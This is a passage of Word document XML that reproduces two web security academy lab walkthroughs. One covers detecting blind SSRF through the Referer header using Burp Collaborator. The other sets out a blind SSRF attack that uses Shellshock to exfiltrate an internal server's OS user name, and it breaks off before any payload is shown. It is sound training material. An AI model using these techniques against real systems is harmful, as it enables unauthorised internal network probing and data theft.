            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Burp Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can use the </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Burp Collaborator client</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> to generate unique domain names, send these in payloads to the application, and monitor for any interaction with those domains. If an incoming HTTP request is observed coming from the application, then it is vulnerable to SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39B6BD" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab: Blind SSRF with out-of-band detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173C30E" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00DB1B0B" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1B0B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610EC8A6" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00DB1B0B" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1B0B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB5CCF" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E42F50" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>burpcollaborator.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512B2D5" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963779C" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>In </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>Burp Suite Professional</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, go to the Burp menu and launch the </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>Burp Collaborator client</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F088EC" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C172C4" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Visit a product, intercept the request in Burp Suite, and send it to Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CA969" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Change the Referer header to use the generated Burp Collaborator domain in place of the original domain. Send the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC03AD" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985D837" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8BAE5" w14:textId="1A10506E" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Simply identifying a blind </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>SSRF vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> that can trigger out-of-band HTTP requests doesn't in itself provide a route to exploitability. Since you cannot view the response from the back-end request, the behavior can't be used to explore content on systems that the application server can reach. However, it can still be leveraged to probe for other vulnerabilities on the server itself or on other back-end systems. You can blindly sweep the internal IP address space, sending payloads designed to detect well-known vulnerabilities. If those payloads also employ blind out-of-band techniques, then you might uncover a critical vulnerability on an unpatched internal server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C2C52" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lab: Blind SSRF with Shellshock exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F191A72" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">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This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11187137" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To solve the lab, use this functionality to perform a </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>blind SSRF</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> attack against an internal server in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>192.168.0.X</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC10BC" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DB009F" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>burpcollaborator.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23753F16" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>In </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>Burp Suite Professional</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, install the "Collaborator Everywhere" extension from the BApp Store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640205AF" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Add the domain of the lab to Burp Suite's </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>target scope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, so that Collaborator Everywhere will target it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0EA7C" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Browse the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04505DB5" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Observe that when you load a product page, it triggers an HTTP interaction with Burp Collaborator, via the Referer header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27A73F" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Observe that the HTTP interaction contains your User-Agent string within the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47E217" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
